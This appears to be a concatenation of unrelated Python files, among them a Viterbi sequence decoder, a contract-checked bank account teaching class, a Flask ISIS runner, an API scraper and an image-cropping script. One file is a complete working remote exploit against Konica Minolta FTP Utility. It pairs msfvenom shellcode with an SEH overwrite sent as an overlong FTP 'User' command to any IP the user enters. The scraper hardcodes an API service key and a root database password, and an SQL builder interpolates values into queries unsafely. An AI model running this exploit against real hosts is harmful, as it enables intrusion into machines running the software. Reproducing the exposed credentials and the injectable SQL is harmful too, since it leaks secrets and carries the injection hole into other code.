        Optional integer specifying how many of the top paths to return. For top_k>=1, returns
        a tuple of two lists: top_k_paths, top_k_scores, For top_k==None, returns a flattened
        tuple with just the top path and its score (not in lists, for backwards compatibility).

    Returns
    -------
    viterbi_path : List[int]
        The tag indices of the maximum likelihood tag sequence.
    viterbi_score : torch.Tensor
        The score of the viterbi path.

    Raises
    ------
    ValueError
        If ``top_k`` is not None and < 1, or if ``tag_observations`` does not
        match the sequence length.
    """
    if top_k is None:
        top_k = 1
        flatten_output = True
    elif top_k >= 1:
        flatten_output = False
    else:
        raise ValueError(f"top_k must be either None or an integer >=1. Instead received {top_k}")
    sequence_length, num_tags = list(tag_sequence.size())
    has_start_end_restrictions = (
        allowed_end_transitions is not None or allowed_start_transitions is not None
    )
    if has_start_end_restrictions:
        if allowed_end_transitions is None:
            allowed_end_transitions = torch.zeros(num_tags)
        if allowed_start_transitions is None:
            allowed_start_transitions = torch.zeros(num_tags)
        # Add two synthetic tags (START at index -2, END at index -1) and
        # embed the original transition matrix in the top-left corner.
        num_tags = num_tags + 2
        new_transition_matrix = torch.zeros(num_tags, num_tags)
        new_transition_matrix[:-2, :-2] = transition_matrix
        # Start and end transitions are fully defined, but cannot transition between each other.
        allowed_start_transitions = torch.cat(
            [allowed_start_transitions, torch.tensor([-math.inf, -math.inf])]
        )
        allowed_end_transitions = torch.cat(
            [allowed_end_transitions, torch.tensor([-math.inf, -math.inf])]
        )
        # First define how we may transition FROM the start and end tags.
        new_transition_matrix[-2, :] = allowed_start_transitions
        # We cannot transition from the end tag to any tag.
        new_transition_matrix[-1, :] = -math.inf
        new_transition_matrix[:, -1] = allowed_end_transitions
        # We cannot transition to the start tag from any tag.
        new_transition_matrix[:, -2] = -math.inf
        transition_matrix = new_transition_matrix
    if tag_observations:
        if len(tag_observations) != sequence_length:
            # BUG FIX: the original raised a plain string, which is a
            # TypeError in Python 3; raise a proper exception instead.
            raise ValueError(
                "Observations were provided, but they were not the same length "
                "as the sequence. Found sequence of length: {} and evidence: {}".format(
                    sequence_length, tag_observations
                )
            )
    else:
        tag_observations = [-1 for _ in range(sequence_length)]
    if has_start_end_restrictions:
        # Pad the observations and the unary scores with the synthetic
        # START/END positions so the restricted decode lines up.
        tag_observations = [num_tags - 2] + tag_observations + [num_tags - 1]
        zero_sentinel = torch.zeros(1, num_tags)
        extra_tags_sentinel = torch.ones(sequence_length, 2) * -math.inf
        tag_sequence = torch.cat([tag_sequence, extra_tags_sentinel], -1)
        tag_sequence = torch.cat([zero_sentinel, tag_sequence, zero_sentinel], 0)
        sequence_length = tag_sequence.size(0)
    path_scores = []
    path_indices = []
    if tag_observations[0] != -1:
        # Force the observed tag by giving it an overwhelmingly large score.
        one_hot = torch.zeros(num_tags)
        one_hot[tag_observations[0]] = 100000.0
        path_scores.append(one_hot.unsqueeze(0))
    else:
        path_scores.append(tag_sequence[0, :].unsqueeze(0))
    # Evaluate the scores for all possible paths.
    for timestep in range(1, sequence_length):
        # Add pairwise potentials to current scores.
        summed_potentials = path_scores[timestep - 1].unsqueeze(2) + transition_matrix
        summed_potentials = summed_potentials.view(-1, num_tags)
        # Best pairwise potential path score from the previous timestep.
        max_k = min(summed_potentials.size()[0], top_k)
        scores, paths = torch.topk(summed_potentials, k=max_k, dim=0)
        # If we have an observation for this timestep, use it
        # instead of the distribution over tags.
        observation = tag_observations[timestep]
        # Warn the user if they have passed
        # invalid/extremely unlikely evidence.
        if tag_observations[timestep - 1] != -1 and observation != -1:
            if transition_matrix[tag_observations[timestep - 1], observation] < -10000:
                # BUG FIX: `logger` was undefined in this module and would
                # have raised NameError; use a lazily-imported module logger.
                import logging
                logging.getLogger(__name__).warning(
                    "The pairwise potential between tags you have passed as "
                    "observations is extremely unlikely. Double check your evidence "
                    "or transition potentials!"
                )
        if observation != -1:
            one_hot = torch.zeros(num_tags)
            one_hot[observation] = 100000.0
            path_scores.append(one_hot.unsqueeze(0))
        else:
            path_scores.append(tag_sequence[timestep, :] + scores)
        path_indices.append(paths.squeeze())
    # Construct the most likely sequence backwards.
    path_scores_v = path_scores[-1].view(-1)
    max_k = min(path_scores_v.size()[0], top_k)
    viterbi_scores, best_paths = torch.topk(path_scores_v, k=max_k, dim=0)
    viterbi_paths = []
    for i in range(max_k):
        viterbi_path = [best_paths[i]]
        for backward_timestep in reversed(path_indices):
            viterbi_path.append(int(backward_timestep.view(-1)[viterbi_path[-1]]))
        # Reverse the backward path.
        viterbi_path.reverse()
        if has_start_end_restrictions:
            # Strip the synthetic START/END positions from the result.
            viterbi_path = viterbi_path[1:-1]
        # Viterbi paths uses (num_tags * n_permutations) nodes; therefore, we need to modulo.
        viterbi_path = [j % num_tags for j in viterbi_path]
        viterbi_paths.append(viterbi_path)
    if flatten_output:
        return viterbi_paths[0], viterbi_scores[0]
    return viterbi_paths, viterbi_scores
def allowed_transitions(constraint_type: str, labels: Dict[int, str]) -> List[Tuple[int, int]]:
    """
    Given labels and a constraint type, returns the allowed transitions. It will
    additionally include transitions for the start and end states, which are used
    by the conditional random field.

    Parameters
    ----------
    constraint_type : ``str``, required
        Indicates which constraint to apply. Current choices are
        "BIO", "IOB1", "BIOUL", and "BMES".
    labels : ``Dict[int, str]``, required
        A mapping {label_id -> label}. Most commonly this would be the value from
        Vocabulary.get_index_to_token_vocabulary()

    Returns
    -------
    ``List[Tuple[int, int]]``
        The allowed transitions (from_label_id, to_label_id).
    """
    num_labels = len(labels)
    start_tag, end_tag = num_labels, num_labels + 1
    labels_with_boundaries = list(labels.items()) + [(start_tag, "START"), (end_tag, "END")]

    def decompose(label):
        # START/END carry no entity part; everything else is "<tag><entity>".
        if label in ("START", "END"):
            return label, ""
        return label[0], label[1:]

    allowed = []
    for src_index, src_label in labels_with_boundaries:
        src_tag, src_entity = decompose(src_label)
        for dst_index, dst_label in labels_with_boundaries:
            dst_tag, dst_entity = decompose(dst_label)
            if is_transition_allowed(constraint_type, src_tag, src_entity, dst_tag, dst_entity):
                allowed.append((src_index, dst_index))
    return allowed
def is_transition_allowed(
    constraint_type: str, from_tag: str, from_entity: str, to_tag: str, to_entity: str
):
    """
    Given a constraint type and strings ``from_tag`` and ``to_tag`` that
    represent the origin and destination of the transition, return whether
    the transition is allowed under the given constraint type.

    Parameters
    ----------
    constraint_type : ``str``, required
        Indicates which constraint to apply. Current choices are
        "BIO", "IOB1", "BIOUL", and "BMES".
    from_tag : ``str``, required
        The tag that the transition originates from. For example, if the
        label is ``I-PER``, the ``from_tag`` is ``I``.
    from_entity: ``str``, required
        The entity corresponding to the ``from_tag``. For example, if the
        label is ``I-PER``, the ``from_entity`` is ``PER``.
    to_tag : ``str``, required
        The tag that the transition leads to. For example, if the
        label is ``I-PER``, the ``to_tag`` is ``I``.
    to_entity: ``str``, required
        The entity corresponding to the ``to_tag``. For example, if the
        label is ``I-PER``, the ``to_entity`` is ``PER``.

    Returns
    -------
    ``bool``
        Whether the transition is allowed under the given ``constraint_type``.

    Raises
    ------
    ValueError
        If ``constraint_type`` is not one of the supported schemes.
    """
    if to_tag == "START" or from_tag == "END":
        # Cannot transition into START or from END
        return False
    if constraint_type == "BIOUL":
        if from_tag == "START":
            return to_tag in ("O", "B", "U")
        if to_tag == "END":
            return from_tag in ("O", "L", "U")
        return any(
            [
                # O can transition to O, B-* or U-*
                # L-x can transition to O, B-*, or U-*
                # U-x can transition to O, B-*, or U-*
                from_tag in ("O", "L", "U") and to_tag in ("O", "B", "U"),
                # B-x can only transition to I-x or L-x
                # I-x can only transition to I-x or L-x
                from_tag in ("B", "I") and to_tag in ("I", "L") and from_entity == to_entity,
            ]
        )
    elif constraint_type == "BIO":
        if from_tag == "START":
            return to_tag in ("O", "B")
        if to_tag == "END":
            return from_tag in ("O", "B", "I")
        return any(
            [
                # Can always transition to O or B-x
                to_tag in ("O", "B"),
                # Can only transition to I-x from B-x or I-x
                to_tag == "I" and from_tag in ("B", "I") and from_entity == to_entity,
            ]
        )
    elif constraint_type == "IOB1":
        if from_tag == "START":
            return to_tag in ("O", "I")
        if to_tag == "END":
            return from_tag in ("O", "B", "I")
        return any(
            [
                # Can always transition to O or I-x
                to_tag in ("O", "I"),
                # Can only transition to B-x from B-x or I-x, where
                # x is the same tag.
                to_tag == "B" and from_tag in ("B", "I") and from_entity == to_entity,
            ]
        )
    elif constraint_type == "BMES":
        if from_tag == "START":
            return to_tag in ("B", "S")
        if to_tag == "END":
            return from_tag in ("E", "S")
        return any(
            [
                # Can only transition to B or S from E or S.
                to_tag in ("B", "S") and from_tag in ("E", "S"),
                # Can only transition to M-x from B-x, where
                # x is the same tag.
                to_tag == "M" and from_tag in ("B", "M") and from_entity == to_entity,
                # Can only transition to E-x from B-x or M-x, where
                # x is the same tag.
                to_tag == "E" and from_tag in ("B", "M") and from_entity == to_entity,
            ]
        )
    else:
        # BUG FIX: the original raised a plain string, which is a TypeError
        # in Python 3; raise a proper exception instead.
        raise ValueError(f"Unknown constraint type: {constraint_type}")
# CDT8 SVL - M. Nebut - 03/2016
# programmation par contrats avec contract.py
class Compte:
    """
    compte non plafonne, avec decouvert autorisable
    >>> compte = Compte()
    >>> compte.autoriser_decouvert(-100.0)
    inv:
        implies(self.decouvert_autorise,
            self.montant >= self.decouvert,
            self.montant >= 0)
    """
    # NOTE: the docstrings in this class are executable design-by-contract
    # specifications consumed by the `contract` module (contract.checkmod is
    # called at module load); their pre:/post:/inv: sections are code and
    # must not be reworded or translated.
    def __init__(self):
        """
        post:
            self.montant == 0.0
            not self.decouvert_autorise
        """
        # Balance ("montant") starts at zero; overdraft ("decouvert") is
        # disabled until explicitly authorized.
        self.montant = 0.0
        self.decouvert_autorise = False
        self.decouvert = None
    def autoriser_decouvert(self, decouvert):
        """
        autorise le decouvert jusqu'a 'decouvert'
        pre:
            decouvert < 0.0
        post:
            self.decouvert_autorise
            self.decouvert == decouvert
        """
        # Allow the balance to drop down to `decouvert` (a negative limit).
        self.decouvert = decouvert
        self.decouvert_autorise = True
    def debiter(self, somme):
        """
        pre:
            somme > 0
        post[self.montant]:
            self.montant == __old__.self.montant - somme
            # self.decouvert_autorise => self.montant >= self.decouvert
            # (not self.decouvert_autorise) => self.montant >= 0
            implies(self.decouvert_autorise,
                self.montant >= self.decouvert,
                self.montant >=0)
        """
        # Withdraw `somme`; the contract layer enforces the overdraft limit.
        self.montant -= somme
    def crediter(self, somme):
        """
        pre:
            somme > 0
        post[self.montant]:
            self.montant == __old__.self.montant + somme
        """
        # Deposit `somme`; no upper bound for this unbounded account.
        self.montant += somme
class ComptePlafonne(Compte):
    """
    ex d'heritage comportemental
    illustration principe de Liskiv viole
    ici implicitement invariant de Compte
    inv:
        self.montant <= self.plafond
    """
    # Teaching example: a capped account whose strengthened precondition on
    # crediter() deliberately violates the Liskov substitution principle
    # with respect to Compte. The docstrings are executable contracts for
    # the `contract` module and must stay verbatim.
    def __init__(self, max):
        """
        post:
            max > 0
        """
        # `plafond` is the balance cap; the rest mirrors Compte.__init__.
        self.plafond = max
        self.montant = 0.0
        self.decouvert_autorise = False
        self.decouvert = None
    def crediter(self, somme):
        """
        heritage implicite de la post-condition
        pre:
            somme > 0
            self.montant + somme <= self.plafond
        # precondition invalide !
        """
        # Deposit `somme`; the added cap precondition is the (intentional)
        # contract-inheritance violation demonstrated by this class.
        self.montant += somme
import contract
# Enable runtime checking of the pre/post/inv contracts declared in the
# docstrings of this module's classes.
contract.checkmod(__name__)

if __name__ == '__main__':
    compte = ComptePlafonne(200.0)
    # Deliberately exceeds the 200.0 cap: with contract checking enabled
    # this is expected to trigger a precondition violation in crediter().
    compte.crediter(500)
|
import logging
from os import chdir, getcwd, getenv
from os.path import exists as path_exists, join as path_join, basename
from os import remove
from subprocess import run as sp_run, PIPE, DEVNULL
from urllib.request import urlretrieve
from uuid import uuid4
from logging import getLogger
from tempfile import NamedTemporaryFile
from flask import request, jsonify
from .._config import ISISServerConfig
logger = getLogger("ISIS")
def _serialize_command_args(arg_dict):
args = list()
listfiles = list()
for k, v in arg_dict.items():
# If the argument is a list, isis wants a "listfile"
if isinstance(v, list):
list_file = "{}.lis".format(uuid4())
with open(list_file, 'w') as f:
for item in v:
print(item, file=f)
v = list_file
listfiles.append(list_file)
args.append("{}={}".format(k, str(v)))
# Return the listfiles too so we can clean them up
return args, listfiles
def run_isis():
    """Flask view: execute a whitelisted ISIS program with JSON-supplied args.

    Expects a JSON body of the form
    ``{"program": <name>, "args": {...}, "remotes": [<arg keys>]}``.
    Arguments named in ``remotes`` are treated as URLs, downloaded into the
    work directory, and replaced by the local temp-file path before the
    program is run. Returns (JSON message, HTTP status).
    """
    temp_files = list()
    listfiles = list()
    orig_dir = getcwd()
    # All work (downloads, listfiles, program output) happens in the
    # configured work directory; restored in the finally block.
    chdir(ISISServerConfig.work_dir())
    try:
        body = request.get_json()
        # Only allow executables in the conda bin
        # (strip("/") prevents escaping the bin directory with an absolute path).
        command = path_join(
            getenv("ISISROOT"),
            "bin",
            body["program"].strip("/")
        )
        if not path_exists(command):
            return jsonify({"message": "Command not found"}), 404
        remote_files = body.pop("remotes", [])
        # Download any arguments that are tagged as remote files
        for arg_key in remote_files:
            if arg_key not in body["args"].keys():
                return jsonify({
                    "message": "remote '{}' not found in args".format(arg_key)
                }), 400
            url = body["args"][arg_key]
            # NamedTemporaryFile is kept open so the file survives until the
            # explicit close() in the finally block.
            dl_file = NamedTemporaryFile('r+', dir=getcwd())
            urlretrieve(url, dl_file.name)
            temp_files.append(dl_file)
            body["args"][arg_key] = dl_file.name
        command_args, listfiles = _serialize_command_args(body["args"])
        status = 200
        response = {"message": "Command executed successfully"}
        # stdout is discarded; ISIS reports errors on stderr.
        proc = sp_run([command, *command_args], stdout=DEVNULL, stderr=PIPE)
        if not proc.returncode == 0:
            status = 500
            stderr = proc.stderr.decode("utf-8")
            response["message"] = stderr
            err_msg = "{} failed\n{}".format(
                ' '.join([basename(command), *command_args]),
                stderr
            )
            logging.error(err_msg)
        return jsonify(response), status
    finally:
        # Auto-cleanup listfiles
        [remove(f) for f in listfiles if path_exists(f)]
        # Clean up temp files
        [f.close() for f in temp_files]
        # Change back to original working directory
        chdir(orig_dir)
|
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
# SEH-based stack buffer overflow exploit (proof of concept, Python 2).
# The payload below spawns calc.exe; bytes must remain exactly as generated.
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
banner = ""
banner +="  ___        __       ____                _    \n"
banner +=" |_ _|_ __  / _| ___ / ___| ___ _ __     / \   | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \   / _ \  | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | | / ___ \ | |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_/_/   \_\_____|\n\n"
print banner
# nSEH: short jump (EB 13) over the SEH record into the NOP sled.
nSEH = "\xEB\x13\x90\x90"
# SEH: address of a POP/POP/RET gadget in the vulnerable binary.
SEH = struct.pack('<L',0x1220401E)
# 8343 filler bytes reach the SEH record; the payload is padded to a
# fixed total length with trailing 'D' bytes.
evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
# FTP control channel; the overflow triggers on the User command argument.
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User ' + evil )
print '[+] https://www.infogen.al/ [+]'
|
# Korean National Police Agency lost-and-found API client
# (also stores the collected records into MySQL).
import urllib.request as ul
import xmltodict
import pymysql.cursors
import sys
from datetime import datetime,timedelta

# Collection window: from 10 days ago ...
date=datetime.today() - timedelta(10)
date_s = str(date)
year = date_s[0:4]
month = date_s[5:7]
day = date_s[8:10]
START_YMD = year+month+day
# ... up to today, both formatted as YYYYMMDD.
date=datetime.today()
date_s = str(date)
year = date_s[0:4]
month = date_s[5:7]
day = date_s[8:10]
END_YMD = year+month+day
# START_YMD = "20190729"
# END_YMD = "20190731"
print("\n\n/****************************************/")
print("     "+START_YMD+"~"+END_YMD+"동안의 데이터 수집")
print("/****************************************/\n\n")
conn = pymysql.connect(
    host='localhost',
    user='root',
    password='0000',
    db='findlost',
    charset='utf8'
)
cursor = conn.cursor()
# Clear out the staging table via a stored procedure.
sql = "call del()"
cursor.execute(sql)
conn.commit()
numOfData = 0
numOfRows = 100
pageNo = 1
# Intended to be run periodically (e.g. via a Linux scheduler on Ubuntu);
# the stored procedure drops and recreates the table on each run.
# Fetch found-item data from the portal APIs.
# for num in (0, 3):
#     print("num값")
#     print(num)
num=0
while 1:
    # `num` selects which of the three API endpoints to page through;
    # num == 3 means all endpoints have been exhausted.
    if num == 0:
        print("습득물 데이터를 받아오는 중입니다...")
        url = f"http://apis.data.go.kr/1320000/LosfundInfoInqireService/getLosfundInfoAccToClAreaPd?serviceKey=XkqweN6T4XhKJwYFZTcyVC2BYwqckYugERg6R%2FMu26u96JtR7X8ifsqv5AWZQsHcRAty%2FAYkQf" \
              f"lO%2FC3SAm5OEw%3D%3D&START_YMD={START_YMD}&END_YMD={END_YMD}&numOfRows={numOfRows}&pageNo={pageNo}"  # found items
    elif num == 1:
        print("분실 휴대폰 데이터를 받아오는 중입니다...")
        url = f"http://apis.data.go.kr/1320000/SearchMoblphonInfoInqireService/getMoblphonAcctoKindAreaPeriodInfo?serviceKey=XkqweN6T4XhKJwYFZTcyVC2BYwqckYugERg6R%2FMu26u96JtR7X8ifsqv5AWZQsH" \
              f"cRAty%2FAYkQflO%2FC3SAm5OEw%3D%3D&START_YMD={START_YMD}&END_YMD={END_YMD}&numOfRows={numOfRows}&pageNo={pageNo}"  # lost mobile phones
    elif num == 2:
        print("습득물(포털기관) 데이터를 받아오는 중입니다...")
        url = f"http://apis.data.go.kr/1320000/LosPtfundInfoInqireService/getPtLosfundInfoAccToClAreaPd?serviceKey=XkqweN6T4XhKJwYFZTcyVC2BYwqckYugERg6R%2FMu26u96JtR7X8ifsqv5AWZQsHcRAty%2FAY" \
              f"kQflO%2FC3SAm5OEw%3D%3D&START_YMD={START_YMD}&END_YMD={END_YMD}&numOfRows={numOfRows}&pageNo={pageNo}"  # found items (portal agencies)
    elif num == 3:
        print("데이터 수집이 완료 되었습니다!!")
        break
    request = ul.Request(url)  # build the request
    # Send it and open the response.
    response = ul.urlopen(request)
    rescode = response.getcode()  # 200 on success
    if (rescode == 200):
        responseData = response.read()  # read the raw payload
        rD = xmltodict.parse(responseData)  # convert the XML into a dict
        #print(rD)  # uncomment to inspect the raw parsed response
        w_data = rD["response"]["body"]["items"]["item"]  # extract just the item records
        #print(w_data)
        totalCount = rD["response"]["body"]["totalCount"]
        print("총 데이터 개수 "+totalCount)
        for i in w_data:  # iterate over the individual items
            numOfData += 1
            print(pageNo)
            print(numOfData,"번째 데이터")
            print("관리ID: " + i["atcId"])
            print("습득일자 : " + i["fdYmd"])
            print("물품명: " + i["fdPrdtNm"])
            print("보관장소 : " + i["depPlace"])
            print("이미지: " + i["fdFilePathImg"])
            print("물품상세설명 : " + i["fdSbjt"])
            print("물품분류명 : " + i["prdtClNm"] + "\n")
            # Parameterized insert into the staging table.
            sql = "insert into main_lostitemstemp(managementID, findYmd, productName, keepPlace, productImg, productDesc, productClass) values(%s, %s, %s, %s, %s, %s, %s)"
            cursor.execute(sql, (i["atcId"], i["fdYmd"], i["fdPrdtNm"], i["depPlace"], i["fdFilePathImg"], i["fdSbjt"], i["prdtClNm"]))
            conn.commit()
        # All pages for this endpoint consumed: reset counters and move on.
        if (numOfData >= int(totalCount)):
            pageNo=0
            numOfData=0
            num+=1
    pageNo += 1
sql = "call changeTable()"  # swap the staging table into place
cursor.execute(sql)
conn.commit()
|
#Input
#The first line of input contains a single decimal integer P, (1≤P≤1000), which is the number of data sets that follow. Each data set should be processed identically and independently.
#Each data set consists of a single line of input.
#It contains the data set number, K,
#followed by the base, b (3≤b≤16) as a decimal integer,
#followed by the positive integer, n (as a decimal integer) for which the Sum Squared Digits function is to be computed with respect to the base b. n will fit in a 32 bit unsigned integer. The data set number K starts at 1 and is incremented by 1 for each data set.
#Output
#For each data set there is a single line of output.
#The single line of output consists of the data set number, K,
#followed by a single space followed by the value of SSD(b,n) as a decimal integer.
#Sample Input 1
#3
#1 10 1234
#2 3 98765
#3 16 987654321
#Sample Output 1
#1 30
#2 19
#3 696
def sum_of_squares(k, b, n):
    """Compute SSD(b, n): the sum of the squares of n's base-b digits.

    Prints "k result" (the expected judge output) and also returns the
    result so the function is usable and testable programmatically.

    :param k: data-set number, echoed in the printed output
    :param b: base, 3 <= b <= 16
    :param n: non-negative integer whose base-b digits are squared and summed
    :return: the SSD value as an int
    """
    result = 0
    while n != 0:
        # divmod with integer floor-division avoids the float round-trip of
        # the original int(n / b), which is unsafe for very large integers.
        n, digit = divmod(n, b)
        result += digit ** 2
    print(k, result)
    return result
# Driver: first input line is the number of data sets; each following
# line holds "K b n" which is forwarded to sum_of_squares.
total_cases = int(input())
for _ in range(total_cases):
    tokens = input().split()
    k, b, n = int(tokens[0]), int(tokens[1]), int(tokens[2])
    sum_of_squares(k, b, n)
import boto.ec2
import WH
# Python 2 script: registers every Elastic IP in us-west-2 with the WH
# service as an allowed host and entry point for the site below.
site_id=40466
if __name__ == '__main__':
    wh = WH.WH()
    wh.connect()
    conn = boto.ec2.connect_to_region("us-west-2")
    # One http/https allowed-host pair and one GET entry point per
    # scheme for every address in the account.
    for a in conn.get_all_addresses():
        print "%s" % (a.public_ip)
        print wh.add_allowed_host(site_id,"http",a.public_ip).request
        print wh.add_allowed_host(site_id,"https",a.public_ip).request
        print wh.add_entry_point(site_id,"GET","http://" + a.public_ip + "/").request
        print wh.add_entry_point(site_id,"GET","https://" + a.public_ip + "/").request
|
class StepSql:
    """SQL statement builders for trace-step rows.

    NOTE(review): all queries are built with %-string interpolation rather
    than driver-side parameters, so values containing quotes will break the
    SQL (and it is injectable if any value is attacker-controlled).
    """
    def add(self, step):
        # INSERT for a new step row. Note the mixed placeholders: step_seq
        # uses %d but trace_seq uses an unquoted %s — presumably traceseq is
        # always numeric; verify against callers.
        query= "insert into tb_e2e_trace_steps \
            (step_seq, trace_seq, step_title, mainclass, subclass, request_cmd, request_param, request_time) \
            values (%d, %s, '%s', '%s', '%s', '%s', '%s', now())" % (step.seq, step.traceseq, step.title, step.mainclass, step.subclass, step.requestcmd, step.requestparam)
        return query
    def get_max_seq(self, trace_seq):
        # Highest step_seq used so far within one trace.
        query= "select max(step_seq) as seq from tb_e2e_trace_steps \
            where trace_seq = %s" % (trace_seq)
        return query
    def delete(self):
        # NOTE(review): reads self.seq/self.traceseq, but StepSql never sets
        # those attributes — this looks like it was meant to take a `step`
        # argument like add() does; confirm before use.
        query = "delete from tb_e2e_trace_steps \
            where step_seq = %d and trace_seq = %d" % (self.seq, self.traceseq)
        return query
    def update(self):
        # NOTE(review): same self.seq/self.traceseq issue as delete(); also
        # targets tb_e2e_trace_list while the rest of the class uses
        # tb_e2e_trace_steps — verify the intended table.
        query = "update tb_e2e_trace_list \
            set response_status = %d, message_detail = '%s', response_time = now() \
            where step_seq = %d and trace_seq = %d" % (self.responsestatus, self.responsemessage, self.seq, self.traceseq)
        return query
class Step(object):
    """A single trace step: identity plus request/response bookkeeping."""

    # Attribute names assigned positionally from the constructor arguments.
    _FIELDS = ("seq", "traceseq", "title", "mainclass", "subclass",
               "requestcmd", "requestparam")

    def __init__(self, seq, traceseq, title, mainclass, subclass, requestcmd, requestparam):
        for attr, value in zip(
            self._FIELDS,
            (seq, traceseq, title, mainclass, subclass, requestcmd, requestparam),
        ):
            setattr(self, attr, value)

    def set_request(self, request_cmd, request_param):
        """Record the outgoing request command and parameters."""
        self.requestcmd = request_cmd
        self.requestparam = request_param

    def set_response(self, response_status, response_message):
        """Record the response status code and message."""
        self.responsestatus = response_status
        self.responsemessage = response_message
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities to assist in inventory pipelines."""
# pylint: disable=line-too-long
from google.cloud.security.inventory.pipeline_requirements_map import REQUIREMENTS_MAP
# pylint: enable=line-too-long
# TODO: The next editor must remove this disable and correct issues.
# pylint: disable=missing-type-doc,missing-return-type-doc
# pylint: disable=missing-param-doc
def can_inventory_groups(configs):
    """A simple function that validates required inputs to inventory groups.

    Args:
        configs: The input flags converted to a dict.

    Returns:
        Boolean: True only when both required group-inventory flags are
        present and truthy.
    """
    return all((
        configs.get('domain_super_admin_email'),
        configs.get('groups_service_account_key_file'),
    ))
def list_resource_pipelines():
    """Prints resources (keys) in the pipeline REQUIREMENTS_MAP (dict)."""
    # Python 2 print statement: shows the comma-joined resource names that
    # have a registered inventory pipeline.
    resources = ', '.join(REQUIREMENTS_MAP.keys())
    print 'Available resources: %s' % resources
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
import time
###########################
# --- Stage 1: crop the region of interest out of a3.jpg -------------------
# Threshold-invert the blurred grayscale image, then find the first/last
# non-empty column and row to obtain a tight bounding box.
image = cv2.imread('a3.jpg',1)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray, (15, 15), 0)
thresh = ~(cv2.threshold(blurred, 200, 255, cv2.THRESH_BINARY)[1])
#cv2.imshow("test",thresh)
# Column sums: first non-zero column from the left edge.
sum_col = sum(thresh)
for i in range(len(sum_col)):
    if sum_col[i] != 0 :
        break
print(i)
ini = i
# ... and from the right edge (scan the reversed sums).
sum_col_rev = sum_col[::-1]
for i in range(len(sum_col_rev)):
    if sum_col_rev[i] != 0 :
        break
fnl = len(sum_col_rev) - i
print(fnl)
# Row sums via the transposed image: top edge ...
sum_row = sum(cv2.transpose(thresh))
for i in range(len(sum_row)):
    if sum_row[i] != 0 :
        break
print(i)
ini_r = i
# ... and bottom edge.
sum_row_rev = sum_row[::-1]
for i in range(len(sum_row_rev)):
    if sum_row_rev[i] != 0 :
        break
fnl_r = len(sum_row_rev) - i
# NOTE(review): this prints `fnl` (the column bound) again, not `fnl_r`.
print(fnl)
image = image[ini_r:fnl_r , ini:fnl]
cv2.imshow("Image", image)
#cv2.imwrite('test.jpg',image)
# --- Stage 2: match the crop against the province templates ---------------
all_sum = []
# Candidate template filenames: province_crop0.jpg ... province_crop9.jpg.
all_plate = []
for i in range(10):
    plate = ('province_crop%d.jpg'%(i))
    all_plate.append(plate)
print(all_plate)
for j in range(len(all_plate)):
    img = cv2.imread(all_plate[j],0)
    ##
    # NOTE(review): 'test.jpg' is read here but the imwrite above is
    # commented out — presumably a previously saved crop is expected on disk.
    template = cv2.imread('test.jpg',0)
    w, h = template.shape[::-1]
    w1,h1 = img.shape[::-1]
    resized = cv2.resize(img, (w,h))
    ret1,img_1 = cv2.threshold(template,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
    ret2,img_2 = cv2.threshold(resized,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
    ##cv2.imshow("img ", img_1)
    ##cv2.imshow("resized ", img_2)
    # NOTE(review): uint8 subtraction wraps around before abs() is applied —
    # confirm this is the intended dissimilarity measure.
    img_3 = abs(img_1-img_2)
    ##
    ##cv2.imshow("3", img_3)
    ##
